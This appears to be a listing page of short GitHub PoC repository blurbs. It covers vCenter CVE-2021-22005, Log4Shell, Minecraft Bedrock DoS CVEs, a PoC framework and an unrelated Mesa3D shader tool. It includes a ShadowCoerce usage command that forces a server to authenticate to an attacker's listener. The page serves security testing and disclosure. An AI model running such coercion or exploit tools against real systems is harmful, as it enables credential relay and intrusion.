中文 README pocsploit is a lightweight, flexible and novel open source poc verification framework Pain points of the POC framework in the market There are too many params, I don’t know how to get started, but only some of them are commonly used. YAML poc framework(like nuclei & xray) is not flexible enough. the conversion cost is very high when writing poc. Sometimes it’s hard when encountering non-http protocols. (only hex can be used) Sometimes POC has false positives, which […]

This is a PoC for compiling Piglet fragment shaders using Mesa3D. You need to provide a compatible vertex shader, it’s needed because Mesa3D compiles both shaders at once. At most one sampler is currently supported. This a PoC and can break at any time. victim.c is loosely based on this EGL sample Dependencies Usage cd compiler make bash compile.sh vertex.glsl fragment.glsl output.bin # only outputs the fragment part for now GitHub View Github    

There are several network-layer vulnerabilities in the official server of Minecraft: Bedrock Edition (aka Bedrock Server),which allow attacker to launch a DoS attack.CVE-2021-45383 is an integer overflow leading to a bound check bypass.CVE-2021-45384 is a null pointer dereference.Here are details & PoCs & possible patches for them. Because both vulnerabilities lie in the network protocol handler,attackers can launch a DoS attack without logining or being in the server player allowlist.CVE-2021-45383 affects Bedrock Server 1.16.0-1.18.2.03.CVE-2021-45384 is an old vulnerability and affects […]

MS-FSRVP coercion abuse PoC Credits: Gilles LIONEL (a.k.a. Topotam)Source: https://twitter.com/topotam77/status/1475701014204461056 Explanation: https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-fsrvp MS Docs: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b “File Server VSS Agent Service” needs to be enabled on the target server. shadowcoerce.py -d “domain” -u “user” -p “password” LISTENER TARGET In my tests, the coercion needed to be attempted twice in order to work when the FssAgent hadn’t been requested in a while. TL;DR: run the command twice if it doesn’t work. GitHub View Github    

0x01 漏洞简介 2021年9月21日，VMware发布安全公告，公开披露了vCenter Server中的19个安全漏洞，这些漏洞的CVSSv3评分范围为4.3-9.8。 其中，最为严重的漏洞为vCenter Server 中的任意文件上传漏洞(CVE-2021-22005)，该漏洞存在于vCenter Server的分析服务中，其CVSSv3评分为 9.8。能够网络访问vCenter Server 上的 443 端口的攻击者可以通过上传恶意文件在 vCenter Server 上远程执行代码。该漏洞无需经过身份验证即可远程利用，攻击复杂度低，且无需用户交互。 0x02 影响范围 vCenter Server 7.0 < 7.0 U2c build-18356314 vCenter Server 6.7 < 6.7 U3o build-18485166 Cloud Foundation (vCenter Server) 4.x < KB85718 (4.3) Cloud Foundation (vCenter Server) 3.x < KB85719 (3.10.2.2) 6.7 vCenters Windows版本不受影响 0x03 漏洞分析 https://xz.aliyun.com/t/10524 https://testbnull.medium.com/quick-note-of-vcenter-rce-cve-2021-22005-4337d5a817ee 0x04 使用说明 注意：本exp只能打目标为Linux版本的vCenter。 帮助说明

POC for detecting the Log4Shell (Log4J RCE) vulnerability. Run on a system with python3python3 log4shell-poc.py pathToTargetFile – containing a list of targets (targets are seperated by newlines) InteractionURL – the endpoint used to monitor out of band data extraction or interactions, e.g: https://github.com/projectdiscovery/interactsh Example Output

log4j rce test environment see: https://www.lunasec.io/docs/blog/log4j-zero-day/ using the included python poc build Either build the jar on your host with mvn clean compile assembly:single Or use docker to build an image with docker build -t log4jpwn . run The server will log 3 things (which are also the triggers). You don’t have to set all 3: The User-Agent header content The request path The pwn query string parameter To use: Run the container with docker run –rm -p8080:8080 log4jpwn (or […]